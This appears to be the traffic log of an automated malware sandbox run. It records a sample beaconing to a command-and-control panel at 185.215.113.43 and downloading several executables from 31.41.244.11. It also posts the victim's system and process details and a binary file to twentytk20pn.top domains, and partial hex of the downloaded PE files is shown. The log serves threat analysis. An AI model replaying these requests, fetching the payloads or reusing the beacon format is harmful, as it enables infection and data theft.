00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4a 00 00 22 00 00 00 84 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 12:38:19 GMTContent-Type: application/octet-streamContent-Length: 765568Last-Modified: Tue, 17 Dec 2024 09:46:16 GMTConnection: keep-aliveETag: "67614868-bae80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 86 04 00 00 d0 02 00 00 86 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 86 04 00 00 60 07 00 00 86 04 00 00 fa 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 12:38:26 GMTContent-Type: application/octet-streamContent-Length: 776832Last-Modified: Tue, 17 Dec 2024 09:45:14 GMTConnection: keep-aliveETag: "6761482a-bda80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 9c 04 00 00 d0 02 00 00 9c 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 9c 04 00 00 70 07 00 00 9c 04 00 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 12:38:32 GMTContent-Type: application/octet-streamContent-Length: 4471808Last-Modified: Wed, 18 Dec 2024 11:58:29 GMTConnection: keep-aliveETag: "6762b8e5-443c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e0 55 60 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 3e 44 00 00 2e 64 00 00 32 00 00 00 40 b6 00 00 10 00 00 00 50 44 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 70 b6 00 00 04 00 00 49 72 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 90 61 00 73 00 00 00 00 80 61 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 1e b6 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 1e b6 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 61 00 00 10 00 00 00 3e 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 80 61 00 00 02 00 00 00 4e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 61 00 00 02 00 00 00 50 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 38 00 00 a0 61 00 00 02 00 00 00 52 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 78 6d 72 62 70 74 77 00 d0 1b 00 00 60 9a 00 00 c2 1b 00 00 54 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 72 6d 64 74 65 74 66 00 10 00 00 00 30 b6 00 00 04 00 00 00 16 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 b6 00 00 22 00 00 00 1a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 12:38:45 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016894001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016895001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 39 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016896001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016897001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: /Content-Type: application/jsonContent-Length: 578513Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 32 35 35 32 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic	HTTP traffic detected: GET /WEIsmPfDcpBFJozngnYN1734366322?argument=JSFdsYpNAyKuuMJE1734525529 HTTP/1.1Host: home.twentytk20pn.topAccept: /
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 39 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016898001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20pn.topAccept: /Content-Length: 462Content-Type: multipart/form-data; boundary=------------------------9ENgszXyUX9XpE7zP8BCHcData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 45 4e 67 73 7a 58 79 55 58 39 58 70 45 37 7a 50 38 42 43 48 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 6f 64 69 70 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a a2 41 5f 6e c7 f4 a6 8f b5 50 51 0b d5 ac 73 d8 99 45 bf 92 17 1c 2a 01 c2 7d ce fe e5 ee 8b 